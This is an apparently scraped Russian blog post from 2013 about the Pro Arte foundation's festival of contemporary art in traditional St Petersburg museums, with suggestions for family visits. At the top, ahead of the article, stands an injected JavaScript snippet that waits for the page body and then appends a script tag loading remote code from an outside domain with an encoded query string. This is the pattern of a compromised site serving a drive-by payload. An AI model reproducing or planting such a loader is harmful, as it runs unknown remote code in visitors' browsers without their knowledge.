(function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://ccz.say-that.info' + '/?82845=6aDp77v_8fL-9vT57qCspKSurw'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window);

вторник, 26 февраля 2013 г.

СОВРЕМЕННОЕ ИСКУССТВО В ТРАДИЦИОННОМ МУЗЕЕ


 Фонд культуры и искусства «Про Арте» – один из мастодонтов продвижения современного искусства в массы. Их офис не случайно находится в Петропавловской крепости – соединять «традиционное» искусство с новейшими тенденциями, вписывать современные проекты в «историю» – один из главных методов работы Фонда. Каждый год в сентябре «Про Арте» проводит фестиваль«Современное искусство в традиционном музее». Специально  детских проектов на этом Фестивале не бывает совсем, но всегда можно найти в программе что-нибудь увлекательное для семейного посещения. Скажем, в прошлом, 2012 году, в Музее оптики можно было увидеть «Песню электрических лампочек», а в подземных казематах Петропавловской крепости – полюбоваться на то, как макет из кучи мусора превращается в ночной Петербург при помощи специального освещения (старые ботинки – корабли, коробки из-под сока — небоскребы).
Органично вписываются современные проекты в научно-исторические музеи вроде Музея Арктики и Антарктики, Пулковской обсерватории или Музея космонавтики и ракетной техники. При этом если взрослых Фестиваль «заманивает» смотреть на непонятное новое искусство с помощью «традиции», то с детьми все может выйти как раз наоборот. Через яркое и необычное современное искусство есть реальный шанс заинтересовать их «остальной» экспозицией: научной, исторической и краеведческой.

Комментариев нет:

Отправить комментарий